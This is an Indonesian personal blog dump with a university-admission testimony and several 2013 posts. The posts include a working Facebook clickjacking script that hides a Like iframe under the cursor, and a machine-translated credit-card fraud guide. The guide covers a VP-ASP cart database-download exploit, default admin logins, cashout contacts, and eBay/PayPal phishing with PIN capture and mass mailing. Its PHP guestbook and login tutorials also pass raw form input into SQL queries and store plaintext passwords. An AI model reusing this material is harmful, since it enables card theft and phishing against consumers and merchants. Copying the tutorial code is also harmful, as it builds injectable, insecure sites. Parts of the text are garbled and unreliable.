News in This Blog

Diterima FKG UI

2018-07-08T16:04:00.000+07:00

Mau cerita nih aku, jadi perkenalkan aku David Su, diterima FKG UI 2018 berkat Tuhan Yesus Kristus. Aku diterima lewat jalur SBMPTN. Jadi, aku SBMPTN belajarnya itu sehabis pengumuman SNMPTN. Nah, sehabis SBMPTN kan soal dibawa pulang, aku cek ternyata yang aku coret di soal dan sesuai dengan kunci jawaban yang aku dapetin online cuma 27 soal untuk saintek (kalo ga salah). Nah, terus aku berdoa dan perjamuan kudus setiap hari, juga didoain oleh ibu gembala sidang Gereja Tiberias Indonesia, ternyata pas pengumuman aku diterima di FKG UI. Itu semua berkat Tuhan Yesus.

2017-07-23T15:46:00.001+07:00

aaaa

Mantap

2016-05-01T15:11:00.001+07:00

Clickjacking fanspage 2

2013-06-13T15:29:00.000+07:00

Sebuah teknik hack yang bisa digunakan untuk phishing (mencuri data pribadi) dan bisa juga untuk penyebaran worm dan worm ini akan menyebar dengan cepat di jejaring sosial itu.
Lewat clickjacking, hacker memancing pengguna Facebook untuk mengklik situs web yang berisi kode-kode berbahaya. Kode-kode itu nantinya akan mengambil alih akun, bahkan mengendalikan akun tersebut, seperti menambah teman, menghapus akun, instal aplikasi. Dan serangan clickjacking ini bukanlah yang pertama kalinya terjadi pada Facebook.
Kini pihak Facebook pun telah mengetahui dan mengembangkan cara untuk memblok/banned aksi clickjacking ini.
Banyak Cara untuk membuat Clickjacking di Facebook, buat contoh bikin Clickjacking Facebook Fanpage aja ya..
Contoh Script Clickjacking Facebook Fanpage :

<script type="text/javascript">
(function(){
 
  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;
 
  if (!IE) document.captureEvents(Event.MOUSEMOVE);
 
  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/germy.blogspot')  +  '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);
 
  window.addEventListener('mousemove', mouseMove, false);
 
  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 16000);
 
  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
   
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
   
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
   
    return true
  }
})();
 
</script>

Sekian Dari Saya Dan Terima KAsih :)

Cara Membuat Software Sendiri

2013-06-13T12:44:00.000+07:00

Banyak Sekali Jenis dan kegunaan aplikasi ini terutama utk install aplikasi sendiri secara personal...tanpa basa basi kita langsung saja ke TKP..Cara membuat Software sendiri

Untuk percobaan pada tutorial ini saya akan pakai aplikasi web browser dari opera dan jika anda yang sedang belajar membuat installer silahkan anda ektrak opera menggunakan 7-zip.
Download >> Instal >> Jalankan Install Creator sekarang.

Tekan tobol next

Tekan tombol browse kemudian telusuri dan cari folder opera (langkah 1) kemudian klik tombol next

Silahkan beri nama sesuai keinginan lalu klik next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

buat ikon yang akan disimpan di start menu dengan ukuran 16×16 atau lebih tinggi dan tempatkan ikon tersebut di folder aplikasi anda, untuk yg sedang belajar membuat installer silahkan klik ikon opera lalu tekan tombol open

Ketik nama korespondennya contoh : opera kemudian beri tanda ceklis pada add desktop shortcut. Selanjutnya silahkan anda membuat ikon untuk shortcut aplikasi anda dengan ukuran minimal 16×16 dan tempatkan di folder aplikasi anda selanjutnya klik next.
Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Konfigurasi pengaturannya sesuai keinginan lalu Tekan tombol next

Silahkan periksa konfigurasi pengaturan sekali lagi barangkali ada tahapan yg terlewatkan, Jika telah sekesai silahkan klik tombol build lalu pilih file exe kemudian save.

Selesai dan aplikasi anda sekarang dapat digunakan

Selamat Mencoba

Cara Hacking CC Atau Credit Card

2013-06-13T12:00:00.000+07:00

Hacker kini semakin memburu nomor kartu kredit dan CVV untuk bisa berbelanja online khusunya di ebay , dan kini hacker semakin canggih dan target utama untuk hacker adalah membobol situs Paypal dimana paypal adalah alat transaksi di dunia online, jika anda ingin membeli di ebay syarat utama yang harus di penuhi adalah harus mempunyai acount Paypal (PPL). Dan kali ini saya akan posting cara Credit Card Hack.

Mari kita mulai dengan beberapa istilah yang mudah.

Apa kartu kredit?

Kartu kredit dari dua jenis:
• Kartu Debit
• Kartu Kredit
1. Debit adalah untuk memiliki jumlah jumlah di dalamnya dan u dapat menggunakannya.2. Kredit berarti u memiliki batas kredit baris seperti sebesar $ 10000 dan u dapat menggunakan mereka dan dengan akhir bulan membayar ke bank.

Untuk menggunakan kartu kredit di internet u hanya tidak membutuhkan nomor cc dan kadaluwarsa tapi u perlu info banyak seperti:
• Nama
• Nama
• Alamat
• Kota
• Negara
• Zip
• Negara
• Telepon
• CC jumlah
• Kadaluwarsa
• CVV2 (ini 3digit kode keamanan di bagian belakang setelah panel tanda tangan). Jika Anda mendapatkan info bahwa Anda dapat menggunakannya untuk membeli hal apapun di internet, seperti lisensi perangkat lunak, keanggotaan situs porno, keanggotaan proxy, atau hal (layanan online biasanya, seperti webhosting, domain).

Jika ingin membuat uang $ melalui hacking maka Anda harus sangat beruntung ... Anda harus memiliki sebuah bank yang tepat dan bin untuk kas bahwa kartu kredit melalui mesin ATM.Mari saya jelaskan bagaimana?

Pertama mempelajari beberapa istilah sederhana.

BINS = 6 digit pertama dari setiap kartu kredit disebut "BIN" (misalnya jumlah cc adalah: 4121638430101157 kemudian bin adalah "412163"), saya harap ini mudah dipahami.

Sekarang pertanyaannya adalah bagaimana untuk menghasilkan uang melalui kartu kredit. Yang aneh ..., baik Anda cant melakukan itu, tetapi ada orang-orang tertentu di dunia yang bisa melakukan itu. Mereka menyebut diri mereka "kasir". Anda dapat mengambil beberapa waktu untuk menemukan kasir handal.Sekarang pertanyaannya adalah kartu kredit bank yang setiap cashable dan bin setiap cashable? Seperti citibank, bank america, MBNA .. semua bank cashables? Yah jawabannya adalah "TIDAK". Jika u tahu beberapa hal, hal kecil tentang sistem perbankan, telah u pernah mendengar apa yang mesin ATM? Di mana u menarik uang tunai ur dengan meletakkan kartu ur masukSetiap bank tidak memiliki ATM, setiap bank tidak mendukung ATM cashout mesin. Hanya sedikit bank mendukung dengan beberapa tempat sampah mereka (u know bin adalah 6 digit pertama dari setiap nomor kartu kredit / debit), untuk kira bank america. Bank yang tidak memiliki hanya 1 bin, bahwa bank diberikan seperti, 412345 412370 adalah sampah ur u dapat membuat kartu kredit pada mereka. Jadi bank yang membagi negara Citi lokasi bijaksana, seperti 412345-412360 adalah untuk amerika, setelah itu bagi orang luar dan seperti ini. Saya harap u mengerti. Jadi semua sampah dari bank yang sama bahkan tidak cashable, seperti untuk kira mereka mendukung ATM di New York dan tidak di California, jadi seperti tempat sampah dari California bank yang sama akan uncashable. Jadi selalu pastikan bahwa tempat sampah dan bank adalah 100% cashable di pasar dengan banyak kasir.

Pastikan kasir yang legit, karena kasir banyak r ada yang mengambil kartu kredit Anda dan merobek u off dan tidak mengirimkan share 50% kembali.Anda juga dapat menemukan beberapa kasir pada mIRC * (irc.unixirc.net / server: 6667) channel: # cashout, # ccpower

Nah, periksa situs web di mana u punya daftar tempat sampah dan bank sebagian besar 101% cashable. Jika u mendapatkan kartu kredit dari bank yang sama dengan bin sama, maka u dapat cashout jika tidak. Ingat untuk menggunakan kartu kredit di internet u tidak perlu PIN (4 kata sandi yang u masukkan dalam Mesin ATM), tapi untuk kebutuhan u cashout. Anda bisa mendapatkan pin hanya dengan Metode 2 hacking yang saya masih tidak posting tetapi saya akan. Metode pertama dari sql injection dan hacking shopadmin tidak memberikan dengan pin, hanya memberikan cc CVV2 mati rasa dan info lain yang biasanya perlu untuk belanja bukan untuk menguangkan.Hacking Kartu Kredit.

CC (Kartu Kredit) dapat hacked dengan dua cara:
• Penipuan Kartu Kredit (biasanya digunakan untuk mendapatkan uang, beberapa kali untuk belanja)
• Kartu Kredit Shopadmin Hacking (hanya untuk menyenangkan belanja,, pengetahuan di internet)
1. Shopadmin Hacking

Metode ini digunakan untuk menguji pengetahuan atau untuk mendapatkan kartu kredit untuk belanja di internet, atau iseng, atau cara apapun tetapi tidak untuk menguangkan (karena metode ini tidak memberikan PIN - 4 digit kode akses) hanya memberikan cc mati rasa, CVV2 dan info dasar lainnya.Shopadmins adalah dari perusahaan yang berbeda, seperti: VP-ASP, X Kereta, dll Tutorial ini untuk hacking VP-ASP TOKO.

Saya harap dilihat setiap kali u mencoba untuk membeli beberapa hal di internet dengan cc, mereka menunjukkan bentuk ua juga diprogram, sangat aman. Mereka gerobak, seperti vp-asp xcarts. Situs tertentu tidak hack, tapi gerobak yang hacked. Di bawah ini aku posting tutorial untuk hack VP ASP keranjang. Sekarang setiap situs yang menggunakan keranjang yang bisa hack, dan melalui mereka * file mdb u bisa mendapatkan 'rincian kartu kredit' klien mereka, dan juga masuk nama dan password admin area mereka, dan semua info lainnya dari klien dan rahasia company.

Mari kita mulai:

Jenis: VP-ASP Shopping CartVersi: 5.00

Bagaimana menemukan VP-ASP 5,00 situs?

Mencari VP-ASP 5,00 situs sangat sederhana ...

1. Pergi ke google.com dan ketik: VP-ASP Shopping Cart 5,002. Anda akan menemukan banyak situs dengan VP-ASP cart software 5,00 diinstalSekarang mari kita pergi ke mengeksploitasi ..

Halaman ini akan seperti ini: **** :/ / *** .victim.com / toko / shopdisplaycategories.aspMengeksploitasi adalah: diag_dbtest.aspSekarang Anda perlu melakukan ini: **** :/ / *** .victim.com / toko / diag_dbtest.asp

Sebuah halaman akan muncul yang berisi:
• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.

Contoh:
Yang paling penting di sini adalah xDatabasexDatabase: shopping140Ok, sekarang URL akan menjadi seperti ini: **** :/ / *** .victim.com/shop/shopping140.mdbJika Anda tidak men-download Database, coba ini sementara ada dblocation:xDblocationresxurl adalah: **** :/ / *** .victim.com/shop/resx/shopping140.mdb

Download file mdb dan Anda harus dapat membukanya dengan penampil file mdb, Anda harus dapat menemukan satu di download.com, atau menggunakan MS Office Access.Di dalam Anda harus dapat menemukan informasi kartu kredit, dan Anda bahkan harus bisa menemukan username dan password admin untuk website.

Halaman login admin biasanya terletak di sini: **** :/ / *** .victim.com / toko / shopadmin.aspJika Anda tidak dapat menemukan username dan password admin di file mdb atau Anda dapat tapi itu tidak benar, atau Anda tidak dapat menemukan file mdb sama sekali, kemudian mencoba untuk menemukan halaman login admin dan memasukkan password default yaitu:
Username: admin
password: admin ATAU
Username: vpasp
password: vpasp

2. Hacking Melalui PenipuanMetode ini biasanya digunakan untuk hack untuk mendapatkan uang. Apa yang terjadi dalam metode ini adalah Anda membuat halaman klon.

Sasaran: pada dasarnya eBay.com atau paypal.com untuk kartu kredit umum, atau jika u ingin menargetkan bank manapun cashable tertentu seperti regionbank.com kemudian u harus membuat halaman klon untuk bank itu.

Apa itu eBay.com?Its situs belanja di seluruh dunia yang digunakan oleh banyak miliar orang yang menggunakan kartu kredit mereka di ebay. Apa yang Anda lakukan membuat sebuah halaman yang sama sama seperti eBay dan meng-upload di beberapa hosting yang tidak memiliki batasan hukum, mencoba untuk menemukan hosting di Eropa mereka akan membuat penipuan Anda untuk waktu yang lama, dan email pengguna eBay.

Cara mendapatkan email dari pengguna mereka?Pergi ke google.com dan ketik "Email Harvestor" atau Spider Email dan mencari Pembeli Penjual eBay dan eBay dan u akan mendapatkan daftar panjang. Bahwa daftar ini tidak akurat tetapi dari 1000 minimal 1 email akan berlaku. Atleast Anda akan mendapatkan beberapa waktu.

Nah u membuat halaman klon dari ebay, dan pesan u membuat daftar dari laba-laba dengan pesan, seperti "Account Anda telah hacked", atau alasan yang terlihat profesional, dan meminta mereka untuk mengunjungi link di bawah ini dan masukkan informasi penagihan Anda, dan halaman penipuan memiliki program ketika mereka memasuki info mereka datang langsung ke email Anda.Pada halaman formulir u memiliki PIN diperlukan agar u juga mendapatkan nomor PIN melalui mana u dapat uang tunai melalui ATM ..

Sekarang jika jangka ebay scam atau penipuan paypal, sampai dengan keberuntungan Anda siapa korban Anda. Seorang klien dari bank amerika atau citibank atau daerah, tentang keberuntungan nya, mungkin u mendapatkan cashable, mungkin u tidak hanya keberuntungan nya, ada yang lain.Cari di google untuk men-download situs scam dan mempelajarinya!

Setelah Anda membuat situs scam Anda, hanya menemukan beberapa harvestor email atau laba-laba dari internet (download yang bagus di Superstore Software Email Massal - Pemasaran Internet Advertising Email) dan membuat daftar email yang baik.

Dan Anda perlu menemukan mailer (massa mengirim mailer) yang mengirim massa - email ke semua email dengan pesan memperbarui account mereka pada halaman penipuan ur).
Dalam dari, gunakan eBay@reply3.ebay.com email dan digunakan Judul: eBay - Update Rekening eBay Anda dan di eBay penggunaan Nama

Beberapa Petunjuk:

1. Pastikan hosting anda tetap up atau link dalam email u akan mengirim, dan ketika email korban Anda mengunjunginya, ia akan menampilkan halaman tidak dapat ditampilkan, dan rencana Anda akan gagal.

2. Titik yang paling sulit adalah mencari hosting yang tetap di scam. bahkan saya tidak menemukannya dengan mudah, bagian yang sangat sangat keras.
3. Mungkin u harus kontak dengan seseorang yang memiliki perusahaan hosting dan lokasi rekan atau dedicated ia dapat menyembunyikan penipuan Anda dalam beberapa didedikasikan tanpa pembatasan.

4. Mencari daftar email yang baik (cara yang baik = benar-benar pengguna)5. Anda massal mailing perangkat lunak tanah email di inbox pengguna.

Semoga bermanfaat..................

Penting: kartu kredit Hacking adalah tindakan ilegal, ini hanya posting informasi dan saya tidak bertanggung jawab atas tindakan yang dilakukan oleh Anda setelah membaca tutorial ini. Posting ini adalah untuk tujuan pendidikan saja.

Okee Tunggu Post Aq yang Lain Ye

cara membuat buku tamu di website

2013-06-13T11:25:00.000+07:00

Selamat Pagi Sahabat bloger dimanapun anda berada :D , kali ini kang aries akan share tentang cara membuat buku tamu web site dengan php. pertama yang perlu disiapkan adalah xampp sudah harus terinstall kemudian editornya terserah pakek notepad ++ atau macromedia tergantung seelera :D. oke untuk langkah pembuatannya slahkan ikuti langkah - langkah dibawah ini ...........

Pembuatan web buku tamu ini ada 6 script silah kan pelajari dan praktikan sendiri oke kawan :)

konek.php

daftar.php

daftar_isi.php

index.php

header.php

footer.php

logout.php

Sebelum kita membuat sciptnya, terlebih dahulu kita membuat

databasenya yah. . .dalam tugas ini aku membuat data base dengan

nama “uas” dan tabelnya dengan nama “pendaftaran”. . .penting ini membuat databasenya,jangan lupa disimpen?

Okay. . .sekarang kita mulai coding. . .

“pertama” dan kesatu kita membuat file pada notepad dengan nama “konek.php”. coba tempel script ini. . .

<?php
$host = "localhost";
$user = "root";
$pass = "";
$db = "bukutamu";
$table = "daftar";
$connect = mysql_connect($host,$user,$pass) or die("Koneksi gagal");
$pilih_db = mysql_select_db($db) or die("Database tidak ada");
$cookie_nama = $_COOKIE['nama'];
?>

Sekali lagi, jangan lupa databasenya ya, karena buat tes-tes disini niii?

Setelah database berhasil conect langkah “kedua” kita buat file dengan nama “login.php”Script ini digunakan untuk akses ke halaman berikutnya. . .yaitu form login harus diisi dan kalau tidak diisi maka tidak bisa kehalaman berikutnya gituuuuuh. . .

<html>
<head>
<title> Tampilan Awal </title>
</head>
<body bgcolor="blue">
</body>
<html>

<?php

include("konek.php");

$user = $_POST['user'];
$password = $_POST['password'];
$query = mysql_query("SELECT * FROM daftar where Nama='$user'") or die (mysql_error());
$result = mysql_fetch_array($query);
$row = mysql_num_rows($query);
/*
echo "<pre>";
print_r($_POST);
echo "hasil=".$row;
echo "</pre>";
*/
if(($user == "") && ($password == ""))
{
echo "<center>Silahkan isi username dan password anda !<br/>
<a href=index.php>Kembali ke Login</a>";
exit;
}
if($row != 0)
{
if($password != $result['Password'])
{
echo "x: $password -- y: $result[Password]";
echo "<center>Silahkan koreksi Password anda!<br/>
<a href=index.php>Kembali ke Login</a>";
}
else
{
$_SESSION['user']=$user;
echo "<center>Anda berhasil login dengan nama
$user<br><br/><br/><font size=5><a href=home.php>Klik disini untuk melanjutkan ke Halaman Utama</a></font>";
}
}
else
{
echo "<center>Maaf, username anda belum terdaftar !<br>Silahkan daftar
<a href='index.php?register=daftar'>disini</a>";
}
?>
<?php mysql_close($connect); ?>

Capcuuus. . .setelah halaman login kita buat,sekarang yang “ketiga” kita buat halaman untuk pendaftaran. . .kita namai filenya dengan “daftar.php”. Fungsi dari halaman ini adalah untuk akses pendaftaran. Jadi gini lho, kalau usernya belum terdaftar kan belum bisa masuk kehalaman berikutnya tuh, jadi harus daftar doelooeee? Oia, untuk isi dari form pendaftaran ini gak harus sama lho? Sesuai selera sajaaaa. . .

<head>
 <title> Halaman Pendaftaran </title>
</head>
<body bgcolor="pink">
<form name="form1" method="post" action="index.php?register2=success">
<div align="center"><table width="437" border="0" id="table_body">
<tr>
<td colspan="2"><h1>PENDAFTARAN</h1></td>
</tr>
<tr>
<td width="152">Nama</td>
<td width="185"><input name="nama" type="text" id="form"></td>
</tr>
<tr>
<td >Alamat</td>
<td><textarea name="alamat" id="form2"></textarea></td>
</tr>
<tr>
<td>Email</td>
<td><input name="email" type="text" id="form"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="password" type="password" id="form"></td>
</tr>
<tr>
<td >Konfirmasi Password </td>
<td><input name="c_password" type="password" id="form"></td>
</tr>
<tr>
<td>Jenis Kelamin</td>
<td><input name="kelamin" type="radio" value="L" unchecked/>
Male
<input name="kelamin" type="radio" value="P" unchecked/>Female</td>
</tr>
<tr>
<td>Nomor Telephone</td>
<td><input name="telephone" type="text" id="form"></td>
</tr>
<tr>
<td >Komentar </td>
<td><textarea name="komentar" id="form2"></textarea></td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td colspan="2"><div align="center">
<p>
<input type="submit" name="Submit" value="Daftar" id="button">
<input type="reset" name="Reset" value="Batal" id="button">
</p>
</div></td>
</tr>
</table>
<p>
<a href="index.php">Kembali ke Login</a>
</p>
</body>
</form>
<?php //mysql_close(); ?>

Menuju pada pembuatan file yang “keempat” yaitu “daftar_isi.php”. file ini merupakan kesatuan dari file daftar, yang biasa kita sebut link apa ya?hehhehe. Jangan lupa, semua field yang ada harus kita cucokkan dengan yang ada didatabasenya yah?

<html>
<head>
 <title> Halaman Login </title>
</head>
<body bgcolor="green">
</body>
</html>

<?php
$nama = $_POST['nama'];
$alamat = $_POST['alamat'];
$email = $_POST['email'];
$password = $_POST['password'];
$c_password = $_POST['c_password'];
$kelamin = $_POST['kelamin'];
$telepon = $_POST['telephone'];
$komentar = $_POST['komentar'];

if($password != $c_password)
{
echo "<script>alert('Konfirmasi password harus sama dengan password!');
javascript:history.go(-1);</script>";
exit;
}
if((!empty($nama)) && (!empty($alamat)) &&(!empty($email)) && (!empty($password)) && (!empty($c_password))&& (!empty($kelamin)) && (!empty($telepon))&& (!empty($komentar)))
{
include "konek.php";
$query = mysql_query("INSERT INTO daftar (nama,alamat, email,password,c_password,kelamin,telephone,komentar)
values ('$nama','$alamat','$email','$password','$c_password','$kelamin','$telepon','$komentar')",$connect);
echo "Anda berhasil mendaftar<br><a href=index.php>Kembali ke Login</a>";
}
else
{
echo "<script>alert('Maaf, tidak boleh ada field yang kosong !');
javascript:history.go(-1);</script>";
}

?>
<?php mysql_close($connect); ?>

File yang “kelima” ini. . yang lumayan mikiiiiir. . . itu halaman index. Dimana halaman ini untuk menampung atau menempel script yang lain-lain diatas dan dibawah juga. . Kita namai file ini dengan “index.php”.

<?php session_start(); ?>
<html>
<head>
 <title> Buku Tamu Idah Dudut </title>
</head>
<body bgcolor="pink">
</div><div align="center">
<?php
include("konek.php");
?>
<?php
if($_GET['register'])
{
include("daftar.php");
exit;
}
?>
<?php
if($_GET['register2'])
{
include("daftar_isi.php");
exit;
}
?>
<?php
if($_GET['login'])
{
include("login.php");
exit;
}
?>
<p>

<form name="form1" method="post" action="index.php?login=success">
<table width="258" border="0" id="table_body">
<tr>
<td colspan="2"><h2>Silahkan Login</h2></td>
</tr>
<tr>
<td width="78">Username</td>
<td><div align="center"><input name="user" type="text" id="form"></div></td>
</tr>
<tr>
<td>Password</td>
<td><div align="center"><input name="password" type="password" id="form"></div></td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td colspan="2"><div align="center"><input type="submit" name="Submit" value="Login" id="button">
<a href="index.php">
<input type="reset" name="Reset" value="Cancel" id="button"></a></div></td>
</tr>
</table>
</form>
<?php mysql_close($connect); ?>
<p>Klik <a
href="index.php?register=daftar">disini</a> untuk mendaftar <em>(Geratis. . .!)</em> </p>
<?php
if($_GET['logout'])
{
include "logout.php";
echo "Anda telah berhasil Logout, Terimakasih anda telah mengunjungi kami...
<p>silahkan login kembali untuk mengunjungi kami !</p>";
}
?>
</div></div>
</body>
</html>

Tenang teman. . .itu semua script coba dijalankan aja dulu baiknya,di test-test jadi apa tidak ya? Trus kalau tidak jadi gimana? Sudahlah istirahat ajja dulu,nanti dilanjutkan lagi. Tapi aku tetap mau melanjutkan. Hahhahaha. Ini tahap yang ke berapa ya? “keenam” kita buat kepala webnya yaitu “header.php”.

<div id="kepala" style="text-align:center;">
<tr>
 <strong><font color="red" size="5" >SELAMAT DATANG DI BUKU TAMU IDAH DUDUT</font></Strong>
</tr>
</div>

Untuk kepalanya kita bebas mau dinamai apa? Selamat Sore juga boleeh? Hampir selesai iniiii. . .hampiiiir? . Karena tadi ada kepala maka kita juga harus ngasih kakikanya dunk biar bisa jalan. . . . Pada bagian “ketujuh” ini kita buat file “footer.php”. seperti biasa. . .teman-teman harus lebih berkreasi dan lebih inovatif lagi ya dalam inputannya. . . karena yang aku buat ini sangan simple dan sederhana.

Ujian Pemrograman web oleh <a href="http://idahceris.wordpress.com" target="_blank"><strong>idah_ceris@yahoo.co.id</strong></a> @ Desember 2011
<a href="index.php?logout=success">Logout</a>

Selesai ini. . .selesaiiiii? Belum selesai totaaaaaaaaaal. File terahir yang “kedelapan” ini adalah file “logout.php” ni scriptnya. . .

<!--?php //session_start(); //$_SESSION[]; session_unset(); session_destroy();  //echo "user aktif: $_SESSION[user]"; //header("Location: index.php?logout=success"); ?-->

Yupz. . .selesaiiiiiii tapii beluum?hehehe. . .aku belum buat file homenya teman-teman. . .mungkin untuk homenya teman-teman udah bisa ya? Pak dosen minta, kalau halaman homenya itu berisi nama-nama tamu. . .tentunya tamu yang udah mendaftar dunk? Ayuh buat halamanhome.php. . .selesaikan sekarang dan pertampaan halaman webmu. Buat 1 file lagi dengan nama “home.php”. Tempel kode dibawah ini. . .

<?php session_start();
//echo "user aktif ". $_SESSION['user'];
if(!isset($_SESSION['user'])){
echo "Maaf, sampeyan belum terdaftar, tak iye<br />";
exit();
}
?>
<html>
<head>
 <title> Halaman Utama Buku Tamu </title>
 <link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body bgcolor="aqua">
<?php //echo "Selamat datang ".$_SESSION['user']; ?>
<div id="menu">
  <ul>
   <li><a href="home.php">Home</a> </li>
   <li><a href="tentangsaya.php">Tentang Saya</a> </li>
   <li><a href="request.php">Request</a> </li>
   <li><a href="hubungisaya.php">Hubungi Saya</a> </li>
  </ul>
 </div>
<div id="isi">
<?
include "header.php";
include "konek.php";
$query=mysql_query("SELECT Nama, Alamat, Email, Kelamin, Telephone, Komentar FROM daftar LIMIT 10") or die (mysql_error());
while($data=mysql_fetch_row($query))
 {
 echo "<table width='30%' align=center border=1 cellspacing=1>";
 echo "<tr><td align='center'>";
 echo "Nama: $data[0] [ $data[3] ] <br />";
 echo "Alamat: $data[1] <br/> email: $data[2] <br />telp. $data[4]<br />";
 echo "Komentar: $data[5]";
 echo "</td></tr></table>";
 }
?>
</div>
<div id="kaki">
<?php
include "footer.php";

?>
</div>
<!--<a href="index.php?logout=success">Logout</a> -->
</body>
</html>

Selamat menikmati :D dan tunggu post ku yang lain ya :)

Cara Membua Halaman Login Pada Website

2013-06-13T11:15:00.000+07:00

Untuk membuat Form sign up dan Login untuk pembangunan sebuah web dengan berbasiskan member saat ini sudah menjadi tren bagi para webmaster yang ingin membangun web yang “look professional”. Pada artikel ini saya akan menjelaskan tutorial untuk membuat form sign up dan login yang masih berbentuk sederhana. Untuk selanjutnya, anda dapat membuat sendiri pengembangan dari script ini. Dan tinggal copy ya kawan :D

1. Langkah pertama, anda harus membuat file ” Config.php”. File ini berfungsi menghubungkan script yang anda buat dengan database. Isi dari file ”config.php”

ini dapat anda lihat di bawah

<?php

$server = “localhost”; // server web anda.

$database = “mydata”; // nama dari database yang anda buat.

$db_user = “myusername”; // username dari mysql anda.

$db_pass = “mypassword”; // password untuk mengakses mysql anda tersebut.

$table = “users”; //nama table yang akan dibuat di database.

Simpan file tersebut di root web anda. Setelah selesai, anda dapat melanjutkan pada tahap yang kedua.

2. Buat file dengan nama ”create.php”. File ini berfungsi menjalankan perintah query database dalam pembuatan table signup dan login ini. Isi dari file ini dapat anda lihat dibawah.

<?php

include (”config.php”);

// connect to the mysql server

$link = mysql_connect($server, $db_user, $db_pass)

or die (”Could not connect to mysql because “.mysql_error());

// select the database

mysql_select_db($database)

or die (”Could not select database because “.mysql_error());

// create table on database

$create = “create table $table (

id smallint(5) NOT NULL auto_increment,

username varchar(30) NOT NULL,

password varchar(32) NOT NULL,

PRIMARY KEY (id),

UNIQUE KEY username (username)

);”;

mysql_query($create)

or die (”Could not create tables because “.mysql_error());

echo “Mantap!!sekarang lanjut deh ke tahap yang ketiga”;

3. Sekarang anda perlu membuat form yang digunakan pengunjung untuk sign up dan berikan nama ”register.html”. File yang anda buat ini boleh berupa halaman HTML biasa yang nantinya akan terhubung pada script php yang nantinya anda akan buat. Untuk percobaan yang sederhana, anda dapat mengkopi script di bawah pada halaman baru dreamweaver .

<html><head>

<title>User Registration</title>

</head><body>

<form action=”register.php” method=”post”>

Pick a Username: <input type=”text” name=”username” size=”20″><br>

Pick a Password: <input type=”password” name=”password” size=”20″><br>

<input type=”submit” value=”Sign Up”>

</form>

</body></html>

4. Setelah itu buat file dengan nama ”register.php”. File ini akan berfungsi sebagai perantara yang menghubungkan file register.html diatas dengan database yang sudah anda buat. Untuk isi dari file ”register.php dapat anda lihat dibawah.

<?php

include(”config.php”);

// connect to the mysql server

$link = mysql_connect($server, $db_user, $db_pass)

or die (”Could not connect to mysql because “.mysql_error());

// select the database

mysql_select_db($database)

or die (”Could not select database because “.mysql_error());

// check if the username is taken

$check = “select id from $table where username = ‘”.$_POST['username'].”‘;”;

$qry = mysql_query($check) or die (”Could not match data because “.mysql_error());

$num_rows = mysql_num_rows($qry);

if ($num_rows != 0) {

echo “Maaf ye, username $username sudah keduluan diambil orang.<br>”;

echo “<a href=register.html>Kata Wiswakarma, tidak boleh menyerah, coba lagi deh..</a>”;

exit;

} else {

// insert the data

$insert = mysql_query(”insert into $table values (’NULL’, ‘”.$_POST['username'].”‘,

‘”.$_POST['password'].”‘)”)

or die(”Could not insert data because “.mysql_error());

// print a success message

echo “Akun Anda Telah Selesai Dibuat!<br>”;

echo “Sekarang anda bisa <a href=login.html>Login sebagai member web Wiswakarma</a>”;

}

5. Sekarang anda perlu membuat form member untuk Login. Beri file ini dengan nama ”login.html”. Isi dari file ini yaitu sbb.

<html><head>

<title>User Registration</title>

</head><body>

<form action=”login.php” method=”post”>

Username: <input type=”text” name=”username” size=”20″><br>

Password: <input type=”password” name=”password” size=”20″><br>

<input type=”submit” value=”Log In”>

</form>

</body></html>

6. Sekarang anda perlu membuat file yang akan menghubungkan file login.html dengan database, berikan nama file ini dengan ”login.php”. Scriptnya dapat anda lihat dibawah.

<?php

include(”config.php”);

// connect to the mysql server

$link = mysql_connect($server, $db_user, $db_pass)

or die (”Could not connect to mysql because “.mysql_error());

// select the database

mysql_select_db($database)

or die (”Could not select database because “.mysql_error());

$match = “select id from $table where username = ‘”.$_POST['username'].”‘

and password = ‘”.$_POST['password'].”‘;”;

$qry = mysql_query($match)

or die (”Could not match data because “.mysql_error());

$num_rows = mysql_num_rows($qry);

if ($num_rows <= 0) {

echo “Sorry, there is no username $username with the specified password.<br>”;

echo “<a href=login.html>Try again</a>”;

exit;

} else {

setcookie(”loggedin”, “TRUE”, time()+(3600 * 24));

setcookie(”mysite_username”, “$username”);

echo “You are now logged in!<br>”;

echo “Continue to the <a href=members.php>members</a> section.”;

}

7. perhatikan file tersebut pad baris ketiga paling bawah, disana berisi <a href=members.php> members.php ini adlah sebuah area yang hanya bisa dilihat oleh para member. Anda dapat membuat file members.php dengan kreasi sendiri. Sekarang saya akan menjelaskan script yang digunakan untuk mengecek cookie, apakah orang tersebut sudah login atau tidak. Simpan scipt ini di seluruh area members. Scriptnya sbb;

<?php if (!isset($_COOKIE['loggedin'])) die(”You are not logged in!

log in”);

